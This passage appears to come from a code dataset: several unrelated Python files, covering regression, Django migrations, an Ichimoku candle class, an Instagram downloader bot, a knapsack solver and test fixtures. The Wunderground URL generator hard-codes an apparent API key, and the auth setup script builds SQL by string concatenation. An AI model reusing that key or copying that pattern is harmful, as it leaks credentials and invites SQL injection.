        ``Current_Weights`` is an (n_features+1, 1) column vector with the
        intercept first; returns the updated copy without mutating the input.

        NOTE(review): the sample loop starts at row 1, skipping row 0 -
        kept from the original; confirm whether that is intentional.
        """
        nof = len(Columns_Of_Sampels) + 1
        gradient = np.zeros((nof, 1))
        teta = np.array(Current_Weights).T   # row vector of weights
        values = np.zeros((nof, 1))
        prediction = np.array(Current_Weights)
        for i in range(1, self.Data_Set.number_of_rows):
            values[0, 0] = 1                 # bias term
            for j in range(1, nof):
                values[j, 0] = self.Data_Set.get(i, Columns_Of_Sampels[j - 1])
            # BUG FIX: the hypothesis is the dot product of weights and
            # features; the original's elementwise ``teta*values`` broadcast
            # to an (nof, nof) matrix and only its [0,0] entry was used.
            h0 = teta.dot(values)
            for j in range(0, nof):
                # BUG FIX: the residual multiplies the feature value:
                # (h0 - y) * x_j, not h0 - y*x_j as originally parenthesised.
                gradient[j, 0] += (h0[0, 0] - self.Data_Set.get(i, True_Y)) * values[j, 0]
        for j in range(0, nof):
            gradient[j, 0] *= Learning_Rate / self.Data_Set.number_of_rows
            prediction[j, 0] = prediction[j, 0] - gradient[j, 0]
        return prediction

    def linear_regression_gradient_descent(self, sample_columns: list, true_y, leaning_rate, number_of_iter):
        """Run ``number_of_iter`` gradient steps from zero weights and
        return the final (n_features+1, 1) weight vector."""
        LL = np.zeros((len(sample_columns) + 1, 1))
        for _ in range(number_of_iter):
            LL = self.step_gradient(LL, leaning_rate, sample_columns, true_y)
        return LL
# Demo/driver code: runs at import time and expects "30.csv" on disk.
z = Csv_File()
z.load_csv("30.csv")
b = Python_Brain()
b.load_data_set(z)
# Column arrays pulled out at module level for inspection.
y = b.Data_Set.get_column_values('X1')
yh = b.Data_Set.get_column_values('X2')
# Fit X2 ~ X1 with 100 gradient-descent steps at learning rate 3e-4.
print(b.linear_regression_gradient_descent(['X1'],['X2'],0.0003,100))
3586012 | <gh_stars>0
# FIXME Extinct
| StarcoderdataPython |
378 | # Generated by Django 4.0.1 on 2022-04-07 01:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop Order.dateTimeCreated, switch Order/OrderedProduct primary keys
    to plain AutoField, and relax OrderedProduct.price to an optional
    CharField."""
    dependencies = [
        ('model_api', '0004_remove_order_created_remove_order_id_and_more'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='order',
            name='dateTimeCreated',
        ),
        migrations.AlterField(
            model_name='order',
            name='_id',
            field=models.AutoField(editable=False, primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='orderedproduct',
            name='_id',
            field=models.AutoField(editable=False, primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='orderedproduct',
            name='price',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
    ]
| StarcoderdataPython |
class PizzaBuilder():
    """Builder for a pizza: each add* method records an ingredient and
    returns self so calls can be chained.

    BUG FIX: the original add* methods assigned the ingredient string to
    the *method's own name* (e.g. ``self.addCheese = "doble queso"``),
    shadowing the method on the instance, and __str__ read attributes
    (_tamano, _chesse, ...) that were never assigned, so printing always
    raised AttributeError.  Ingredients now live in dedicated private
    fields initialised in __init__.
    """
    def __init__(self, tamanio) -> None:
        self.tamanio = tamanio        # pizza size in inches
        # Ingredient slots default to empty so __str__ never fails.
        self._cheese = ""
        self._pepperoni = ""
        self._salami = ""
        self._pimientos = ""
        self._cebolla = ""
        self._champinones = ""
    def addCheese(self):
        self._cheese = "doble queso"
        return self
    def addPepperoni(self):
        self._pepperoni = 'pepperoni'
        return self
    def addSalami(self):
        self._salami = "salami"
        return self
    def addPimientos(self):
        self._pimientos = "pimientos"
        return self
    def addCebolla(self):
        self._cebolla = "cebolla"
        return self
    def addChampinones(self):
        self._champinones = "champinones"
        return self
    def __str__(self):
        return f'Mi pizza es de {self.tamanio}" con los siguientes ingredientes: salsa de tomate, queso, {self._cheese}, {self._pepperoni}, {self._salami}, {self._pimientos}, {self._cebolla} y {self._champinones}'
class PizzaDirector:
    """Directs the builder through the standard fully-loaded 18-inch pizza."""
    @staticmethod
    def construct():
        # Each add* call returns the builder, so stepwise calls are
        # equivalent to the chained form.
        builder = PizzaBuilder(18)
        builder.addCheese()
        builder.addPepperoni()
        builder.addSalami()
        builder.addPimientos()
        builder.addCebolla()
        builder.addChampinones()
        return builder
| StarcoderdataPython |
3448247 | from decimal import Decimal
class Candle(object):
    """A candlestick bar annotated with Ichimoku indicator values.

    ``bar`` is expected to expose ``Open``/``High``/``Low``/``Close`` and
    ``EndTime``.  ``pattern_long``/``pattern_short`` are optional indicator
    objects exposing ``Current.Value`` (candlestick-pattern indicators).

    Fix: ``SenkouBOpen`` previously used ``SenkouA`` (copy-paste bug), which
    made it identical to ``SenkouAOpen``.
    """

    bar = None
    tenkan = 0.0
    kijun = 0.0
    senkouA = 0.0
    senkouB = 0.0
    pattern_long = None
    pattern_short = None

    def __init__(self, bar, tenkan, kijun, senkouA, senkouB, pattern_long=None, pattern_short=None):
        self.bar = bar
        self.tenkan = tenkan
        self.kijun = kijun
        self.senkouA = senkouA
        self.senkouB = senkouB
        self.pattern_long = pattern_long
        self.pattern_short = pattern_short

    # --- raw bar pass-throughs -------------------------------------------
    @property
    def Open(self):
        return self.bar.Open

    @property
    def High(self):
        return self.bar.High

    @property
    def Low(self):
        return self.bar.Low

    @property
    def Close(self):
        return self.bar.Close

    @property
    def Time(self):
        return self.bar.EndTime

    # --- Ichimoku lines ---------------------------------------------------
    @property
    def Tenkan(self):
        return self.tenkan

    @property
    def Kijun(self):
        return self.kijun

    @property
    def SenkouA(self):
        return self.senkouA

    @property
    def SenkouB(self):
        return self.senkouB

    @property
    def Chikou(self):
        # NOTE(review): chikou span equals the current close here; any time
        # lag is assumed to be handled by the caller -- confirm.
        return self.bar.Close

    # --- derived spreads --------------------------------------------------
    @property
    def OC(self):
        # Signed candle body: positive for an up candle.
        return self.bar.Close - self.bar.Open

    @property
    def HL(self):
        # Full candle range (always non-negative for sane bars).
        return self.bar.High - self.bar.Low

    @property
    def Kumo(self):
        # Cloud thickness (signed).
        return self.SenkouA - self.SenkouB

    @property
    def KijunSenkouA(self):
        return self.Kijun - self.SenkouA

    @property
    def KijunSenkouB(self):
        return self.Kijun - self.SenkouB

    @property
    def KijunTenkan(self):
        return abs(self.Kijun - self.Tenkan)

    @property
    def KijunClose(self):
        return abs(self.Kijun - self.Close)

    @property
    def KijunOpen(self):
        return abs(self.Kijun - self.Open)

    @property
    def SenkouAOpen(self):
        return abs(self.SenkouA - self.Open)

    @property
    def SenkouBOpen(self):
        # Fixed: previously computed abs(SenkouA - Open), duplicating
        # SenkouAOpen instead of measuring the distance to senkou span B.
        return abs(self.SenkouB - self.Open)

    # --- relative positions -----------------------------------------------
    @property
    def isCloseBelowTenkan(self):
        return self.Close < self.Tenkan

    @property
    def isCloseBelowKijun(self):
        return self.Close < self.Kijun

    @property
    def isCloseAboveTenkan(self):
        return self.Close > self.Tenkan

    @property
    def isCloseAboveKijun(self):
        return self.Close > self.Kijun

    @property
    def isOpenBelowTenkan(self):
        return self.Open < self.Tenkan

    @property
    def isOpenBelowKijun(self):
        return self.Open < self.Kijun

    @property
    def isOpenAboveTenkan(self):
        return self.Open > self.Tenkan

    @property
    def isOpenAboveKijun(self):
        return self.Open > self.Kijun

    @property
    def isTenkanBelowKijun(self):
        return self.Tenkan < self.Kijun

    @property
    def isTenkanAboveKijun(self):
        return self.Tenkan > self.Kijun

    @property
    def MiddleOfBody(self):
        # Only meaningful when the body dominates the candle (wicks make up
        # less than 40% of the range); requires Decimal-valued bar fields.
        if (self.HL - abs(self.OC)) < (self.HL * Decimal(0.4)):
            thirty = abs(self.OC) / Decimal(3)
            return (self.Low + thirty), (self.High - thirty)
        return None

    # --- pattern indicator values ------------------------------------------
    @property
    def patternLongValue(self):
        if self.pattern_long:
            return self.pattern_long.Current.Value
        return 0

    @property
    def patternShortValue(self):
        if self.pattern_short:
            return self.pattern_short.Current.Value
        return 0

    @property
    def isPatternDown(self):
        return self.patternShortValue == -1.0 and self.OC <= 0.0

    @property
    def isPatternUp(self):
        return self.patternLongValue == 1.0 and self.OC >= 0.0

    # close and ichimoku
    @property
    def isDown(self):
        return self.OC < 0

    @property
    def isUp(self):
        return self.OC > 0
| StarcoderdataPython |
8121925 |
# Agent names (is equal to method name of the agent)
from typing import Optional
class AgentNames:
    """Registry of agent identifiers (each equals the agent's method name)."""

    AGENT_GATEWAY = "agent_gateway"
    AGENT1 = "agent1"
    AGENT_B = "agent_b"
    AGENT_C = "agent_c"
    AGENT_SAVE_TO_DISK = "agent_save_to_disk"
    AGENT_TRANSFORMER_COLOR_BGR2GRAY = "agent_transformer_color_bgr2gray"
class AgentTopic:
    """Derives the input channel (topic) name for a given agent."""

    @staticmethod
    def get_agent_input_channel_name(agent_name: str) -> Optional[str]:
        """Return the input channel for *agent_name*, or None for an empty name."""
        if agent_name == "":
            return None
        return AgentTopic._eval_agent_input_channel_name(agent_name)

    @staticmethod
    def _eval_agent_input_channel_name(agent_name: str) -> str:
        """Lower-case the agent name and append the channel suffix."""
        return agent_name.lower() + "-input-topic"
| StarcoderdataPython |
5035036 | <filename>src/socialprofile/migrations/0024_auto_20220111_0008.py
# Generated by Django 3.2.11 on 2022-01-10 23:08
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated field tweaks for socialprofile.

    Mostly adds ``blank``/``null`` flags and verbose names to existing
    boolean/char fields; no columns are added or removed.
    """

    dependencies = [
        ("socialprofile", "0023_auto_20211216_1745"),
    ]

    operations = [
        migrations.AlterField(
            model_name="socialprofile",
            name="edited_by_facebook",
            field=models.BooleanField(
                blank=True, default=False, verbose_name="Facebook edited"
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="edited_by_google",
            field=models.BooleanField(
                blank=True, default=False, verbose_name="Google edited"
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="edited_by_instagram",
            field=models.BooleanField(
                blank=True, default=False, verbose_name="Instagram edited"
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="edited_by_twitter",
            field=models.BooleanField(
                blank=True, default=False, verbose_name="Twitter edited"
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="edited_by_user",
            field=models.BooleanField(default=False, verbose_name="User edited"),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="google_isPlusUser",
            field=models.BooleanField(
                blank=True, default=False, null=True, verbose_name="Google Plus"
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="google_verified",
            field=models.BooleanField(
                blank=True, default=False, null=True, verbose_name="Google Verified"
            ),
        ),
        # Avatar source selector: social-network picture, predefined or custom.
        migrations.AlterField(
            model_name="socialprofile",
            name="image_avatar",
            field=models.CharField(
                blank=True,
                choices=[
                    ("socials", "Socials"),
                    ("predef", "Predefined"),
                    ("custom", "Custom"),
                ],
                default="socials",
                max_length=100,
                verbose_name="Avatar Picture",
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="image_avatar_predef",
            field=models.CharField(
                blank=True,
                choices=[
                    ("avatar1.png", "Male 1"),
                    ("avatar2.png", "Male 2"),
                    ("avatar3.png", "Female 1"),
                    ("avatar4.png", "Male 3"),
                    ("avatar5.png", "Male 4"),
                    ("avatar6.png", "Male 5"),
                    ("avatar7.png", "Male 6"),
                    ("avatar8.png", "Female 2"),
                ],
                default="avatar1.png",
                max_length=100,
                verbose_name="Predef Avatar Picture",
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="is_active",
            field=models.BooleanField(
                blank=True,
                default=True,
                help_text="Designates whether this user should be treated as active. Unselect this instead of deleting accounts.",
                null=True,
                verbose_name="Active",
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="is_staff",
            field=models.BooleanField(
                blank=True,
                default=False,
                help_text="Designates whether the user can log into this admin site.",
                null=True,
                verbose_name="Staff",
            ),
        ),
        migrations.AlterField(
            model_name="socialprofile",
            name="twitter_verified",
            field=models.BooleanField(
                blank=True, default=False, null=True, verbose_name="Twitter Verified"
            ),
        ),
    ]
| StarcoderdataPython |
9674111 | <filename>download_url_generator/wunderground.py
from pathlib import Path
from utility import next_date
def download_links(base_path):
    """Build (local JSON path, Wunderground API url) pairs for every date
    produced by ``next_date()``."""
    base_url = 'https://api-ak.wunderground.com/api/606f3f6977348613/history_{}/units:metric/v:2.0/q/pws:{}.json'
    weather_station = 'IUFFENHE3'

    pairs = []
    for current_date in next_date():
        stamp = current_date.strftime('%Y%m%d')
        target = Path(base_path, '{}.json'.format(stamp))
        pairs.append((target, base_url.format(stamp, weather_station)))
    return pairs
| StarcoderdataPython |
146977 | from fastapi.testclient import TestClient
from app import app
import json
import psycopg2
import random
import string
import base64
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.backends import default_backend
import sys
import bcrypt
# Test fixture management for the auth database: "setup" inserts a dummy
# user (uid 9999) plus a watchdog code, "cleanup" removes them again.
testmail = "<EMAIL>" #TODO fill in (This is where the test emails get send to)
conn = psycopg2.connect("dbname='auth_db' user='auth_db' host='auth_db' [redacted-2]")
cursor = conn.cursor()
if len(sys.argv) < 2:
    print("Too few arguments. Try 'setup' or 'cleanup'!")
elif sys.argv[1] == "setup":
    # bcrypt returns salt+hash as one token; decoded for the text column.
    hashed = bcrypt.hashpw("password".encode('utf8'), bcrypt.gensalt()).decode("ascii")
    # NOTE(review): testmail is concatenated straight into the SQL string;
    # harmless only because it is a constant here -- prefer a %s parameter.
    cursor.execute("INSERT INTO users(uid,email,password,permissions) VALUES(9999,'"+testmail+"',%s,0)",(hashed,))
    cursor.execute("INSERT INTO wdcodes(wdcode,uid,secret) VALUES('xxxxxxxxxxxxxxxx',9999,'[redacted-7]')")
    conn.commit()
    print("SUCCESS!")
elif sys.argv[1] == "cleanup":
    cursor.execute("DELETE FROM users WHERE uid=9999")
    cursor.execute("DELETE FROM wdcodes WHERE uid=9999")
    conn.commit()
    print("SUCCESS!")
else:
    print("Possible commands:")
    print("setup")
    print("cleanup")
| StarcoderdataPython |
3547188 | <gh_stars>0
import os
from instaloader import Instaloader
class Config:
    """Runtime configuration for the Instagram downloader bot.

    All credentials come from environment variables; the large strings below
    are user-facing bot messages (HTML markup for Telegram).
    """

    # NOTE(review): int("") raises ValueError when API_ID is unset --
    # the process will crash at import time without this variable.
    API_ID = int(os.environ.get("API_ID", ""))
    API_HASH = os.environ.get("API_HASH", "")
    BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
    USER = os.environ.get("INSTAGRAM_USERNAME", "")
    OWNER = os.environ.get("OWNER_ID", "")
    INSTA_SESSIONFILE_ID = os.environ.get("INSTA_SESSIONFILE_ID", None)
    # Space-separated status ids parsed into a set of ints.
    S = "0"
    STATUS = set(int(x) for x in (S).split())
    # NOTE(review): shared Instaloader instance created at import time.
    L=Instaloader()
    # Help text shown by /help (Telegram HTML).
    HELP="""
I can Download almost anything From your Instagram Account hehe.
<b>What Can Be Downloaded?:</b>
1. All posts of any Profile. (Both Public and Private,for private profiles you need to be a follower.)
2. All Posts from your feed(but don't try to spam).
3. Stories of any profile (Both Public and Private,for private profiles you need to be a follower.)
4. DP of any profile
5. Followers and Following List of any Profile.
6. List of followers who follows back the given username.
7. List of followers who are not following back the given username.
8. Stories of your Followers.
9. Tagged posts of any profile.
10. Your saved Posts.
11. IGTV videos.
12. Highlights from any profiles.
13. Any Public Post from Link(Post/Reels/IGTV)
I can do anything sir
<b>How to Download:</b>
Its Easy!!
But login first with /login command.
You have two Options:
1. From Username:
Just send any instagram username.
For Example:
<code>feat.zai</code>
<code>z4iee</code>
<code>2ampillow</code>
2. From URL:
You can also sent a post link to download the post or video.
<b>Available Commands and Usage</b>
/start - To check whether I'm alive! But seriously I wanna die.
/restart - Restart me ofc (If you messed up anything use /restart to cool me down.)
/help - Shows this sh*t.
/login - ofc Login into your account.
/logout - Logout of your account.
/account - Shows the details of ur acc.
/posts <username> - Download posts of any username. Use /posts to download own posts.
Example : why should I provide you?
/igtv <username> - Downloads igtv video even though who sees igtv videos.
/feed <number of posts to download> - Downloads posts from your feed (provide no of posts). .
Eg: <code>/feed 10</code> to download latest 10 posts from feed.
/saved <number of posts to download> - Downloads your saved posts(remember to provide no of posts).
Example: <code>/saved 10</code> to download latest 10 saved posts.
/followers <username> - Get a list of all followers of given username.
/fans <username> - Get a list of of followees who follow back the given username.
/notfollowing <username> - Get a list of punks who don't follow back! .
/tagged <username> - Downloads all posts in which given username is tagged.
/story <username> - Downloads all stories from given username.
/stories - Downloads all the stories of all your followers.
/highlights <username> - Downloads highlights from given username.
"""
    # Greeting for regular users; {} placeholders are filled with the user's
    # and the owner's display name / id.
    HOME_TEXT = """
<b>Hi ishigami here, [{}](tg://user?id={})
I work for my president to manage student council (ig)
I will only work for my master [{}](tg://user?id={}).
Use /help to know What I can Do?</b>
"""
    # Greeting shown to the bot owner.
    HOME_TEXT_OWNER = """
<b>Hi, [{}](tg://user?id={})
I'm ishgami to manage your Instagram account.
Use /help to know what I can do for you.</b>
"""
| StarcoderdataPython |
6669362 | <reponame>nidhiteresa216/Studentregform
# Generated by Django 3.2.10 on 2022-01-04 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the student registration ``Details`` model."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Details',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=30, verbose_name='Student First Name')),
                ('last_name', models.CharField(max_length=60, verbose_name='Student Last Name')),
                ('date_of_birth', models.DateTimeField(verbose_name='Date Of Birth')),
                ('phone', models.CharField(max_length=12, verbose_name='Contact')),
                ('email', models.EmailField(max_length=254, verbose_name='EmailID')),
                ('address', models.CharField(max_length=250, verbose_name='Residence')),
                ('college_name', models.CharField(max_length=100, verbose_name='College Name')),
                ('course', models.CharField(max_length=50, verbose_name='Course Name')),
                ('about', models.TextField(blank=True)),
            ],
        ),
    ]
| StarcoderdataPython |
246359 | <reponame>brenns10/smbio
"""Demo for smbio.util.progress stuff."""
from smbio.util.progress import progress, pzip, progress_bar
import time
# Index tells it which index positional argument contains the number of
# iterations.
# Index tells the decorator which positional argument holds the number of
# iterations.
@progress_bar(index=0)
def fib(n):
    """Yield the first *n* Fibonacci numbers, starting from 1."""
    prev, curr = 0, 1
    for _ in range(n):
        yield curr
        prev, curr = curr, prev + curr
def main():
    """Demo each progress helper with short artificial delays."""
    # Decorated generator: the bar length comes from the argument to fib.
    for value in fib(20):
        print(value)
        time.sleep(0.05)

    # Wrap a plain iterable.
    for _ in progress(range(10)):
        time.sleep(0.1)

    # Progress-aware zip over two ranges.
    for _ in pzip(range(10), range(20)):
        time.sleep(0.1)
# Run the demo only when executed as a script.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
3571167 | <filename>v2/tests/security/views/test_resend_confirmation_email.py<gh_stars>100-1000
import pytest
from flask import url_for
@pytest.mark.usefixtures('user')
class TestResendConfirmation:
    """Endpoint tests for ``api.resend_confirmation_email``."""

    def test_email_required(self, api_client):
        # Posting without a payload must be rejected with a field error.
        endpoint = url_for('api.resend_confirmation_email')
        response = api_client.post(endpoint)
        assert response.status_code == 400
        assert 'email' in response.errors

    def test_cannot_reconfirm(self, user, api_client):
        # An already-confirmed address cannot request new instructions.
        endpoint = url_for('api.resend_confirmation_email')
        response = api_client.post(endpoint, data={'email': user.email})
        assert response.status_code == 400
        assert 'Your email has already been confirmed.' in response.errors['email']

    @pytest.mark.options(SECURITY_CONFIRMABLE=True)
    def test_instructions_resent(self, api_client, outbox, templates):
        from backend.security.models import User
        from backend.security.views.user_resource import register_user

        new_user = User(username='test',
                        email='<EMAIL>',
                        password='password',
                        first_name='the',
                        last_name='user')
        register_user(new_user)

        endpoint = url_for('api.resend_confirmation_email')
        response = api_client.post(endpoint, data={'email': new_user.email})
        assert response.status_code == 204

        # One welcome mail from registration plus one resent confirmation.
        assert len(outbox) == len(templates) == 2
        assert templates[0].template.name == 'security/email/welcome.html'
        assert templates[1].template.name == 'security/email/confirmation_instructions.html'
        # Each mail must carry its own confirmation link.
        assert templates[0].context.get('confirmation_link') != templates[1].context.get('confirmation_link')
| StarcoderdataPython |
9794900 | # python3
"""
Check whether it is possible to partition natural integers into
three subsets with equal sums
EX: [5, 2, 3, 1, 6, 1] -> [5, 1], [6], [2, 3, 1]
"""
def backtrack(matrix, nums):
    """Recover the items behind the optimal value of a filled DP table.

    Walks the table from the bottom-right corner: whenever a cell's value
    differs from the cell in the row above, the item belonging to that row
    was taken.

    Returns ``(used_items, unused_items)`` where ``used_items`` are indices
    into ``nums``.  NOTE(review): ``unused_items`` is best-effort (items
    below the point where the remaining weight reaches zero are not
    collected); callers in this module only rely on ``used_items``.
    """
    used_items = []
    unused_items = []
    knapsack_w = matrix[-1][-1]
    i = len(matrix) - 1
    while knapsack_w > 0:
        if matrix[i][knapsack_w] != matrix[i - 1][knapsack_w]:
            used_items.append(i - 1)
            knapsack_w -= nums[i - 1]
        else:
            unused_items.append(nums[i - 1])
        i -= 1
    # Items past the (possibly truncated) table were never considered.
    return used_items, unused_items + nums[len(matrix):]


def fill_discrete_knapsack(total_weight, weights):
    """0/1 knapsack DP where each item's value equals its weight.

    Returns the (possibly truncated) DP table as soon as ``total_weight`` is
    reached exactly, the full table when the final cell equals
    ``total_weight``, and ``None`` when the target cannot be reached.
    """
    matrix = [[0] * (total_weight + 1) for _ in range(len(weights) + 1)]
    for i in range(1, len(weights) + 1):
        for knapsack_w in range(1, total_weight + 1):
            num = weights[i - 1]
            case_a = matrix[i - 1][knapsack_w]  # skip item i-1
            if num <= knapsack_w:
                case_b = matrix[i - 1][knapsack_w - num] + num  # take item i-1
            else:
                case_b = case_a
            optimal_num = max(case_a, case_b)
            if optimal_num <= knapsack_w:
                matrix[i][knapsack_w] = optimal_num
                # Stop early once the target weight is hit exactly.
                if knapsack_w == total_weight and optimal_num == total_weight:
                    return matrix[:i + 1]
    return matrix if matrix[-1][-1] == total_weight else None


def can_be_partitioned(nums):
    """Return 1 if ``nums`` can be split into three subsets of equal sum.

    Greedy strategy: fill three knapsacks of capacity ``sum(nums) // 3`` one
    after another, removing used items each time.  NOTE(review): the greedy
    approach can reject some valid partitions (see the commented-out case in
    ``test``); the algorithm is kept as-is -- this revision only removes
    leftover debug ``print`` calls and hoists the used-index set out of the
    filter (it was rebuilt once per element).
    """
    nums_sum = sum(nums)
    if len(nums) < 3 or nums_sum % 3 != 0:
        return 0
    knapsack_w = nums_sum // 3
    # Try to fill three discrete knapsacks (without repeating items).
    for _ in range(3):
        knapsack = fill_discrete_knapsack(knapsack_w, nums)
        if knapsack is None:
            return 0
        used_items, _ = backtrack(knapsack, nums)
        used = set(used_items)
        nums = [num for i, num in enumerate(nums) if i not in used]
    return 1
def test():
    """Smoke tests for can_be_partitioned; prints OK when all cases pass."""
    cases = [
        ([3, 3, 3, 3], 0),
        ([40], 0),
        ([17, 59, 34, 57, 17, 23, 67, 1, 18, 2, 59], 1),
        ([1, 2, 3, 4, 5, 5, 7, 7, 8, 10, 12, 19, 25], 1),
        # Known limitation of the greedy strategy:
        # ([10, 10, 10, 7, 7, 7, 7, 7, 7, 6, 6, 6], 1),
        ([1, 1, 1], 1),
        ([0, 0, 0], 1),
    ]
    for nums, expected in cases:
        assert can_be_partitioned(nums) == expected
    print("OK")
def main():
    """Read the count line (ignored) and the numbers from stdin, print 0/1."""
    input()  # first line holds the element count; the list length suffices
    nums = [int(token) for token in input().split()]
    print(can_be_partitioned(nums))
if __name__ == "__main__":
    # Run the self-checks first, then process stdin input.
    test()
    main()
| StarcoderdataPython |
237637 | <reponame>kamahmad/summer-code-jam-2020<filename>annoyed-alligators/socl_media/apps/terminal/methods.py
from django.shortcuts import redirect
from django.urls import reverse
from GoogleNews import GoogleNews
from .models import NewsHistory
import ast
class TerminalCommand():
    """Container for all terminal commands.

    Parses a raw command string ("<command> <args...>") and dispatches it to
    the method of the same name via :meth:`run`.
    """

    def __init__(self, command_string: str, request):
        # First whitespace-separated token selects the handler method.
        self.specified_method = command_string.split()[0]
        # Everything after the first space; when there is no space, find()
        # returns -1 and params ends up equal to the whole command string.
        self.params = command_string[command_string.find(" ") + 1:]
        self.request = request

    def run(self, **kwargs):
        """Dispatch to the method named by the command, or report 'not found'."""
        try:
            method_to_call = getattr(self, self.specified_method)
            response = method_to_call(self.params, **kwargs)
        # NOTE(review): this also swallows AttributeErrors raised *inside*
        # the handler, mis-reporting them as unknown commands.
        except AttributeError as e:
            response = {'response': f"{self.specified_method}: command not found"}
        return response

    def logout(self, params=None, **kwargs):
        """Log the current user out and redirect to the logout view."""
        redirect = reverse('logout')
        message = f"Logged out {self.request.user.username}"
        return {'response': message, 'redirect': redirect}

    def signup(self, params=None, **kwargs):
        """Redirect to the signup view unless already authenticated."""
        if self.request.user.is_authenticated:
            message = "Log out to create a new account"
            return {'response': message}
        else:
            redirect = reverse('signup')
            message = "enter details to signup"
            return {'response': message, 'redirect': redirect}

    @staticmethod
    def message(params: str = None, **kwargs):
        """Handle the 'message' command (help text or delivery confirmation)."""
        help_text = "message: use this to send messages<br><br>"\
                    "Usage: message username [args] [message text]<br>"\
                    "options:<br>"\
                    "--help: get help (this screen)<br>"\
                    "--last: view the last message sent to the user<br>"
        # NOTE(review): params.split()[0] raises IndexError on empty params;
        # --last advertised above has no handler here -- confirm intent.
        if params.split()[0] == '--help':
            message = help_text
        elif params.count(' ') == 0:
            message = "Message text not provided <br>"\
                      "Usage: message username message text"
        else:
            user = params.split()[0]
            message = f"Message delivered to {user}."
        return {'response': message}

    @staticmethod
    def news(topic: str, start_date: str = None, end_date: str = None, **kwargs):
        """Handle the 'news' command.

        Fresh search (Page/Article both 0): replaces the stored history with
        new Google News results and shows the first three headlines.
        Page != 0: shows that page of the cached results.
        Article != 0: returns the full summary of one cached article.
        """
        page_num = int(kwargs.get('Page', '0'))
        article_num = int(kwargs.get('Article', '0'))
        if page_num == 0 and article_num == 0:
            # Drop the previous search before storing a fresh one.
            try:
                NewsHistory.objects.latest('search_time').delete()
            except Exception as e:
                print("No news history for this user", repr(e))
            googlenews = GoogleNews()
            googlenews.search(topic)
            googlenews.getpage(1)
            articles = googlenews.result()
            # Filter out entries with degenerate titles.
            articles = [article for article in articles if len(article['title']) > 10]
            # NOTE(review): user_id is hard-coded to 1 -- confirm multi-user intent.
            db_entry = NewsHistory(user_id=1, search_topic=topic, last_fetched_count=0, news_articles=str(articles))
            articles = articles[0:3]
            db_entry.save()
        else:
            news_list = NewsHistory.objects.latest('search_time')
            # Articles were stored via str(list); literal_eval restores them.
            news_items = ast.literal_eval(news_list.news_articles)
            if page_num != 0:
                article_start_num = page_num * 3
                articles = news_items[article_start_num:article_start_num+3]
            elif article_num != 0:
                article = news_items[article_num - 1]
                article_link = '<a href="{}" target="_blank">Read full article</a>'.format(article['link'])
                article = "<br>" + "<br>".join([article['title'], article['desc'], article_link])
                return {'response': article}
        # Render "<serial>, <date>, <media>, <title>" lines for the page.
        article_text = []
        for i, article in enumerate(articles):
            serial_number = str(i + 1 + page_num * 3)
            article_summary = (serial_number, f"{article['date']}, {article['media']}", article['title'])
            article_text.append(article_summary)
        all_articles = "<br>".join([", ".join(i) for i in article_text])
        return {'response': all_articles, 'followup': True}
| StarcoderdataPython |
3514040 | from utilsPy.utilspackage import moeda
# Demo for the utilsPy.moeda currency helpers: read a price and show its
# half, double, a 10% increase and a 5% decrease, formatted as currency.
p = float(input('Digite o preço: R$'))
print(f'A metade de {moeda.moeda(p)} é: R${moeda.metade(p)}')
print(f'O dobro de {moeda.moeda(p)} é: R${moeda.dobro(p)}')
print(f'Com um aumento de 10% o valor fica: {moeda.moeda(moeda.aumentar(p, 10))}')
print(f'Com uma redução de 5% o valor fica: {moeda.moeda(moeda.diminuir(p, 5))}')
| StarcoderdataPython |
9620010 | from .ecg_tokenizer import EcgPadder as Padder, EcgTokenizer as Tokenizer
from .ecg_vit import EcgVitConfig, EcgVit, load_trained, EcgVitVisualizer
from . import train
from .evaluate import evaluate_trained, get_eval_path
| StarcoderdataPython |
48783 | from collections import (
OrderedDict,
)
from unittest.mock import Mock
import pandas as pd
from datetime import (
datetime,
)
from fireant import *
from fireant.slicer.references import ReferenceType
from fireant.slicer.totals import get_totals_marker_for_dtype
from fireant.utils import (
format_dimension_key as fd,
format_metric_key as fm,
)
from pypika import (
JoinType,
Table,
functions as fn,
)
class TestDatabase(VerticaDatabase):
    """Vertica database stub for the fixtures below: ``connect`` is a Mock,
    so no real connection is ever opened."""

    # Vertica client that uses the vertica_python driver.
    connect = Mock()

    def __eq__(self, other):
        # Every TestDatabase instance compares equal.  NOTE: defining __eq__
        # without __hash__ makes instances unhashable (Python sets
        # __hash__ = None).
        return isinstance(other, TestDatabase)
# Shared fixture objects used by the slicer and dataframe fixtures below.
test_database = TestDatabase()
politicians_table = Table('politician', schema='politics')
voters_table = Table('voter', schema='politics')
state_table = Table('state', schema='locations')
district_table = Table('district', schema='locations')
deep_join_table = Table('deep', schema='test')
# Slicer fixture describing the mock US-election dataset: joins, dimensions
# and metrics over the politician table.
slicer = Slicer(
    table=politicians_table,
    database=test_database,
    joins=(
        # NOTE(review): this district join is declared twice with identical
        # arguments -- likely one of them was meant for another table.
        Join(table=district_table,
             criterion=politicians_table.district_id == district_table.id,
             join_type=JoinType.outer),
        Join(table=district_table,
             criterion=politicians_table.district_id == district_table.id,
             join_type=JoinType.outer),
        Join(table=state_table,
             criterion=district_table.state_id == state_table.id),
        Join(table=voters_table,
             criterion=politicians_table.id == voters_table.politician_id),
